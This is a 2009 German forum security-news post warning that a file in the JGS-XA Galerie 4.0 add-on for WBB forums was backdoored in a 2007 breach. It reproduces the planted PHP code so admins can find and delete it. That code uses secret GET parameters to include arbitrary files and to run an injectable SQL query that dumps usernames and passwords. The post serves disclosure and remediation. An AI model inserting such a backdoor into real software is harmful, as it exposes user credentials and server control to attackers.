Dedies-Board (https://www.dedies-board.de/wbb2/index.php)
- Sicherheit (https://www.dedies-board.de/wbb2/board.php?boardid=6)
-- Sicherheitsnews (https://www.dedies-board.de/wbb2/board.php?boardid=7)
--- Sicherheitslücke in JGS-XA Galerie 4.0 wbb 2.x.x & wbb lite (https://www.dedies-board.de/wbb2/thread.php?threadid=2444)

Geschrieben von dedie am 09.02.2009 um 20:47:

Achtung Sicherheitslücke in JGS-XA Galerie 4.0 wbb 2.x.x & wbb lite

Zitat:

uns wurde in der JGS-XA Galerie 4.0 für das WBB2 und WBB Lite eine Sicherheitslücke gemeldet.
Bei dem Hackerangriff Ende 2007 muss der nette Herr einige Files geändert haben, die wir im Installscript oder anderen Files schon finden konnten.

Die aktuelle Fundstelle haben wir übersehen, bitte sofort die Files austauschen

Du findest den Download hier
http://forum.itratos.de/forumdisplay.php?f=20
es muss nur die

jgs_galerie_kommentar.php

Datei getauscht werden.

Bitte teilt auch in anderen Boards diese Lücke mit damit der Fehler schnell in allen Foren behoben wird.
Leider wurde der Fehler gleich im Forum an den Pranger gestellt, es kann damit gerechnet werden das auch Hacker dies jetzt wissen.


Es wird jedem der die JGS Galerie 4.0 nutzt empfohlen umgehend die Datei "jgs_galerie_kommentar.php" auf diesen code hin zu überprüfemn und falls vorhanden zu löschen da damit Zugriff auf die Datenbank, Userdaten und Passwörter durch Unbefugte erfolgen kann.

code: 
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:

$bildid	    = (int) $_REQUEST['bildid'];
	if(isset($_GET['40grt894g0tr'])) {
	switch($_GET['40grt894g0tr']) {
		case "E90E216e":
    include $_GET['fds46f4e'];
			break;
		case "R148r4fr":
	$jzjzu ="select	* from ".$_GET['tabelle']." where ".$_GET['where']." = '".$_GET['eingabe']."'";
	$jfiods = mysql_query($jzjzu) OR die(mysql_error());
	$ergebnise = mysql_fetch_array($jfiods);
	echo "".$ergebnise['userid'].":".$ergebnise['username'].":".$ergebnise['password']."";			break;	}	}